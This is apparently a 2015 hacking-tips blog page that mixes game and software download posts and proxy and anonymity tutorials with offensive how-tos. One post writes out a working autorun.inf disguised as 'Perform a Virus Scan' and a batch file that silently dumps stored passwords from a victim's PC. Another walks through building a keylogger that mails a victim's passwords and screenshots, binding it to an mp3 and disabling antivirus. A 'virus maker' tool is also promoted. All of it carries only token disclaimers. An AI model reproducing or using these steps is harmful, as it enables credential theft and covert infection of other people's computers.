Wednesday, December 9, 2015

counter strike download free


Counter strike System Requirements
Minimum 
CPU:                          Info
CPU Speed:          1.7 GHz
RAM:                             512 MB
OS:                              Windows 7 (32/64-bit)/Vista/XP
Video Card:         DirectX 8.1 level Graphics Card
Sound Card:         Yes
Free Disk Space: 4.6 GB

Recommended

 
CPU:                                Pentium 4 processor (3.0 GHz, or better)
CPU Speed:               3.0 GHz
RAM:                               1 GB
OS:                                       Windows 7 (32/64-bit)/Vista/XP
Video Card:               DirectX 9 level Graphics Card
Sound Card:               Yes
Free Disk Space:      4.6 GB

ScreeN Shots




Download link

If you want to download Counter-Strike 1.6 game just click one of two link's, first one is direct download link, just click it and you will directly download Counter Strike 1.6 game for free after few seconds, if you want to download CS 1.6 .torrent file and download game using uTorrent or another torrent client just click on second link.





how to download facebook videos

          http://www.downvids.net

DEADLY VIRUS MAKER


What is Computer Virus?

A computer virus is a stealth program that is injected into your computer without your knowledge and runs against your wishes and frustrate you some time. Viruses can also replicate themselves. All computer viruses are man-made.A virus can replicates itself by being copied or initiating its copying to another program, computer boot sector or files,etc.Some viruses are also used to get useful information of users like credit card details,email-id passwords,etc.
In this post i am sharing "Deadlines Virus Maker" with you all.This software will help you out to make some computer viruses easily.

FEATURES DEADLINES VIRUS MAKER


1 Show message box at Windows Start-up.
2 Can be added to Start-up.
3 Close Widows Live Messenger.
4 Close Skype.
5 Close Yahoo Messenger.
6 Random things happens to computer.
7 Infinite Beeping.
8 Infinite Message Boxes.
9 Disconnect from the Internet.
10 Disable Firewall.
11 Disable Browser(Chrome,Firefox & IE).
12 Open Random files.
13 Force Shutdown.
14 Disable Task Manager. 
15 Disable Command Prompt.
16  Disable Reg-edit.
17 Disable Windows Explorer.
18 Randomly Move Mouse. 
19 Press Keyboard keys Randomly.
20 Slow Computer.
21 Force Restart.
22 Crazy CD Drive.
23 Disable Mouse.
24 Delete Clipboard Text.
25  Kill every process.
26 Disable Calculator.
27 Disable Notepad.
28 File Pumper.
29 File Binder.
30 Extension Spoofer.
31 Visit random URL at random time.




PLEASE DON'T FORGET TO SHARE THIS INFORMATION WITH YOUR FRIENDS.
NOTE:ABOVE INFORMATION IS FOR EDUCATION AND SECURITY PURPOSE ONLY.IF YOU MISUSE OR MISTREAT THE ABOVE INFORMATION,THEN IT CAN BRING UNLAWFUL CHARGES BY THE PERSON ON WHOM YOU USED THIS TRICK.THE AUTHOR WILL NOT BE RESPONSIBLE IN THE EVENT ANY UNLAWFUL CHARGES ARE BROUGHT TO YOU BY ANY INDIVIDUALS BY MISUSING THE ABOVE INFORMATION.WE WON'T TAKE RESPONSIBILITY FOR ANY OF YOUR ACTION RELATED TO ABOVE INFORMATION.

HACK PASSWORD USING PEN DRIVE


You will need the following tools to create your rootkit.

Click on their name to download them.

MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger,Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0, v6.0

Protected Storage Pass View: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…

PasswordFox: Password Fox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field,Password Field, and the Signons filename.

HERE IS A STEP BY STEP PROCEDURE TO CREATE THE PASSWORD RETRIEVING/HACKING PENDRIVE TOOLKIT.

NOTE: You must temporarily disable your antivirus before following these steps.


1. Download all the 5 tools.To download,click on the name of software.
Extract them and copy only the executables (.exe files) into your USB Pendrive .i.e. Copy the files mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Pendrive.

2. Open Notepad  and copy the following text into it.
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

save the Notepad and rename it from
"New Text Document.txt" to autorun.inf
Now copy the autorun.inf  file onto your USB Pendrive.

Open cmd,navigate to your pendrive,to navigate in your pendrive type "d:" and hit enter,where "d" is drive name.Then type this commands "attrib -s -h *.* /s  /d".This will hide all the data in your pendrive.

3. Again open Notepad file and copy the following text onto it.

start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt

Save the Notepad and rename it from
"New Text Document.txt" to "launch.bat".
Copy the "launch.bat"  file also to your USB drive.

Now your rootkit is ready and you are all set to sniff the
passwords. You can use this pendrive on any computer to sniff
the stored passwords.

JUST FOLLOW THESE STEPS TO RETRIEVE/HACK PASSWORD.

Step 1:-  Insert the pendrive and the autorun window will pop -up(This is because, we have created an autorun pendrive).
Step 2:- In the pop-up window, select the first option (Perform a
Virus Scan).
Step 3:- Now all the password recovery tools will silently get executed in the background (This process takes hardly a fewseconds).The passwords get stored in the .TXT files.
Step 4:- Remove the pendrive and you'll see the stored passwordsin the .TXT files.

This hack works on Windows 2000, XP,till now i have not tested it on windows 7,so try it if you can and then give us feedback.

Warning: This procedure will only recover the stored passwords (if any) on the Computer.

NOTE:THESE SOFTWARE ARE USED TO RECOVER PASSWORDS FROM WINDOWS,ITS THE REDESIGNING AND CREATIVITY THAT WE MADE IT INTO A AUTO-EXECUTABLE PROGRAM TO RECOVER PASSWORD SILENTLY WITHOUT ANYONE KNOWLEDGE.
NOTE:TRY THIS AT YOUR OWN RISK.IF YOU MISUSE OR MISTREAT THE ABOVE INFORMATION,THEN IT CAN BRING UNLAWFUL CHARGES BY THE PERSON ON WHOM YOU USED THIS TRICK.THE AUTHOR WILL NOT BE RESPONSIBLE IN THE EVENT ANY UNLAWFUL CHARGES ARE BROUGHT TO YOU BY ANY INDIVIDUALS BY MISUSING THE ABOVE INFORMATION.THE ABOVE INFORMATION IS FOR EDUCATION AND RESEARCH PURPOSE ONLY.WE WON'T TAKE RESPONSIBILITY FOR ANY OF YOUR ACTION RELATED TO ABOVE TRICK.


how to hack facebook account with keylogger

how to hack facebook account with keylogger

Today we are really going
to take a very hot tutorial
on how to hack facebook
with keylogger,alot of
people have been sending
me mail to post a tutorial
on how to Hack fb,please
for those that does not like
hacking please don't be
offended by this post,and i
hope one day dat when u
forget ur pc password or
have any problem that will
need the help of hacking
maybe by then u will
know the value of
hacking,and in this group
will do not use our
hacking for evil,and if we
find out dat any members
does evil with the hacking
tutorial,he/ she will be
banned from the group,so
take ur time and go
through this tutorial.and i
hope u will love it.
Keylogger to hack into
anyone’s facebook
account. Keylogger does
more than hacking
facebook account
password. This
keylogger will mail you
all the saved
passwords on your
victims PC to your Gmail
account. As Most
facebook addicts do
save their password in
their web-browser,
there is high possibility
that you will get
facebook login details.
Alon with this the
keylogger will also mail
you all the information
about your Victim. This
information includes
Screenshots, opened
window details, visited
websites and much
more.
Not all hacking
softwares and
keyloggers are Anti-
Spywares Shielded.
Most Antivirus
Softwares are familiar
with these free
keyloggers and they
might flag this
keylogger as a Virus. So
to experience this
keylogger you might
need to temporarily
turn off your antivirus
or uninstall it. But Don’t
worry, if your victims
antivirus is not up to
date or freeone, there
are high chances that
you may end up getting
his keylogs. So give it a
Try.
Recommended: Buy
Antivirus shielded
SniperSpy key-logger
that operates in
stealth mode!
-Features of
Emissary
Keylogger:
Can mail all the
Keystrokes including
login details
Can send screenshots
of the victim’s Screen
Can Block VirusScanning
Websites on victim’s
computer
Can Disable
TaskManager on
victim’s PC
Can Disable Regedit on
victim’s PC
-How to hack facebook
password with keylogger
First make sure you
have ‘Microsoft’s .net
Framework‘ installed on
your PC, if you dont
have pleasedownload and
install it. [*] The victim
need not have .net
framework. Follow the

Steps below:

Step 1: Download
Emissary Keylogger
Software and extract
the files to desktop. If
your Antivirus deletes
the file, then please
turnoff your Antivirus
or uninstall it and try
downloading again.
Step 2: Run
Emissary.exe’ file and
enter your gmail
account details, so that the
password and other info
of your victim can
be mailed to you. If you
are afraid of entering
your gmail details, then
do create one
temporary fake account
and enter those details.
Step 3: After you enter
your ‘Gmail account
details Click on ‘Test’ to
test the connection to
your Gmail account. In
the Server name Field
you can change the
name if you want. enter
any Time Interval in the
interval field. This timer
controls the time
interval between two
keylogs emails. You can
also show fake error
message to your Victim
when he clicks your
server.exe file. to do so
enter the error title and
description in the ‘Fake
error message’ field.
Step4: Now after filling
the required fields, Click
Build’ button. This will
create another file
called server.exe in the
same directory.
Step5: Now send this
server.exe file to victim
and make him install it
on his computer. You
can use Binder or
Crypter to bind this
server.exe file with say
any .mp3 file so that
whenever victim runs
mp3 file, server is
automatically installed
on his computer
without his knowledge.
also read: How to
change ICON of .exe
file?
[ * ] Now because this
is a free keylogger, you
can’t send server.exe
file via email. Almost all
email domains have
security policy which
does not allow
sending .exe files. So to
do this you need to
compress the file with
WinRar or upload it to
Free File Storage
Domains, like Mediafire,
rapidshare, filethief etc.
Step6: Once the victim
runs your sent
keylogger file on his
computer, it searches
for all the stored
usernames and
passwords and it will
send you email
containing all keylogs
and screenshots
regularly after the
specified ‘Time interval’
NOTE:This post is for
educational purpose only.
Please help invite ur
friends to the group

Build your own Smart DNS Proxy and unblock Netflix from anywhere

Build your own Smart DNS Proxy and unblock Netflix from anywhere 

There are many commercial services on the Internet, which allow their users to bypass Netflix geographic blocks in order to access content out of region. For example, if you are a US expat living in the UK and want to access the US Netflix catalogue, this is the common way do achieve this.


The following step(s) show you how to build your own solution to do this, instead of relying on commercial services. For more information, please visit
https://github.com/ab77/netflix-proxy

Step 1: Smart DNS Proxy with DigitalOcean

DigitalOcean is a cloud hosting provider, which we will use to build our Smart DNS Proxy solution.

Head over to Digital Ocean to signup and get $10 USD credit..
Create a Droplet using Docker 1.x application image (find it under Аpplications images).
Make sure to create the Droplet in the right geographical location (e.g. if you want to watch US content, create it in a US data centre).
SSH to your Droplet and run the following command at the console:
cd /opt && git clone https://github.com/ab77/netflix-proxy

Point your DNS at the Droplet IP and watch Netflix out of region.

Enjoy or raise a new issue if something doesn't work quite right..

How to unblock blocked websites?

         How to unblock blocked websites? 

If your ISP or Government have blocked any website and you are no longer able to access your favorite sites, don't worry there is solution to every problem, same for blocked sites, you can unblock blocked sites easily everywhere in world with just few clicks, here I will explain step by step.

We will use proxies to unblock blocked sites as VPN are paid and everyone can't pay.

Step 1: Get some fresh proxies


There are thousands of free proxies available online, just collect some fresh one as we need them to unblock any site, some of working proxies are given below:
                                                      Hiload
                                                         Video Proxy
                                                       Unblock YouTube

These are working and updated proxies, you can also use other of your choice or get some new one free Unblock Proxy, it depends upon you what you choose, all proxies work in same way but some proxies are slow.

How to browse the Internet anonymously

 How to browse the Internet anonymously

As today surfing the web without protection is unsafe, this instructable will show you how to browse the internet anonymously. When you browse internet anonymously, this means no one knows who you are and you can also browse blocked websites!

Step 1: Things you'll need...


-A computer (d'uh)
-Internet(d'uh)
-Windows OS

Hide yourself from the internet

          Hide yourself from the internet 

If you have ever wanted to use your computer in complete privacy and have no worry that you are leaving a trace that you were there; you should read this tutorial.
----------------------------------------------------------------------------------------------------------------------------------
(I AM NOT RESPONSIBLE FOR HOW YOU USE THIS INFORMATION: YOU SHOULD ONLY USE THIS INFORMATION FOR LEGAL PURPOSES)
----------------------------------------------------------------------------------------------------------------------------------
Step 1: Ultra Surf

I use this program called "Ultra Surf" that connects you to a dynamic proxy server. A proxy server is basically another computer which serves as a hub through which internet requests are processed. By connecting through one of these servers, your computer sends your requests to the proxy server which then processes your request and returns what you were wanting. In this way it serves as an intermediary between your home machine and the rest of the computers on the internet. Proxies are used for a number of reasons such as to filter web content, to go around restrictions such as parental blocks, to screen downloads and uploads and to provide anonymity when surfing the internet.



How to Change your Computers IP Address and be Anonymous Online

How to Change your Computers IP Address and be Anonymous Online 



This tutorial is going to show you how you can change your computers IP address in a manner where your computer is hidden online and you get to browser the web in complete privacy, security and anonymity.

Before you are taught HOW to Change Your IP Address you need to know:

What an IP Address is.
The different ways of changing your IP address.
Which methods of changing your IP address are best suited for hiding your computer online and which are not.


What is an IP Address?

An IP address is a unique number assigned to every single computer that is connected to the internet. It is the way computers online are given an address. When you visit websites and chat online there is data that is constantly entering and leaving your computer. The data leaving your computer is mostly in the form of requests for information and the data entering your computer is the internet response to your requests.

For example, if you click a link in a web page you are sending out a request for that web page as well as the files that make up that web page such as images, text, videos,etc.

Every request your computer sends out is tagged with your computerIP Address. . That way, when the data your computer requests is sent out the internet knows WHICH COMPUTER online to send the request files and data to.

IP Addresses and the Postal Service Analogy

Imagine the internet is the postal service. In order for the postal service to deliver mail (data) to you it has to know your homes address. Imagine if every day the post office received thousands of letters to go out and none of them had an address!! With the address (ip address) written on the letter the postman can successfully deliver the letter to your house (computer).

Why should I Hide or Change my IP Address

Your IP address reveals a lot of information about you and your computer such as:

Where you live.
Who your internet service provider is.
What operating system your computer has.
What web browser you are surfing the internet with.

If you are NOT hiding your IP address then EVERY SINGLE WEBSITE you visit can see all this information. If/when this information reaches the wrong hands (hackers) your online security could seriously be compromised and fast.

If I Change my IP Address Will Data Still Get to my Computer

Yes because when you change your IP address the internet is notified of this change. (just like when you give the post office a change of address your mail is forwarded to your new address). CHANGING your IP address is sort of a misnomer though. Actually changing your IP address does nothing to protect your privacy and make you anonymous and invisible online. In reality we are HIDING our IP address and making the internet THINK our IP address is something other than what it really is. This is generally accomplished via a proxy server.

What is a Proxy Server?

A proxy server is a special type of computer whose job is to act as an internet middleman for people who want to hide their IP address and be hidden online. Yes, there are actually thousands of computers out there whose sole jobe is help up hide our online identity.

The way a proxy server works is that all of your computers requests for data and web pages gets sent to the proxy server. It is the proxy server that goes out and gets the files/web pages you want and then forwards them to you. The net result is the proxy server is revealing his IP address and information instead of you.

Step 1: Hide your IP Address with Web Proxies

A web proxy is a website that allows you to visit other websites through it. The way it works is the web proxy website has a textbox. In the textbox you enter the url of the website you wish to visit. The web proxy displays that website within a frame that fills most of the entire page. Any links you click within the website you are visiting will also be displayed within the web proxies frame. This way the websites you visit think it is the web proxy website that is doing the visiting and not you.

Advantages of Web Proxy

Simple and easy to use.

Disadvantages or Web Proxy

Most web proxies display advertising at the top part of the web pages. Some web proxies are very obnoxious about this. The trick is to find a good web proxy such ashide my ass.

How to Access Blocked Websites, Unblock Restricted Sites

How to Access Blocked Websites, Unblock Restricted Sites 

If your network administrator or ISP have blocked some web sites you want to browse, don't worry, just try this Instructable.

Step 1: Get free working web proxy


2. Choose country and click button "Get web proxy"

Linux operating system Free download

  Linux operating system Free download





Linux operating system is faster than Windows ,
linux and its different types like ubuntu,centos,mint etc..
Linux use commands,that is very difficult
Downaload full and free version.
Link : download


here is another link ,click here and enjoy linx operating system,which is very helpful in programming hacking and other activities.


Link:  Download

Download Whatsapp apk for nokia

         Download Whatsapp apk for nokia

Download All apk files of whatsapp and other androiad applications :follow link Download

Latest Abode Flash player Free download

     Latest Abode Flash player Free download

Adobe flash player Free download links: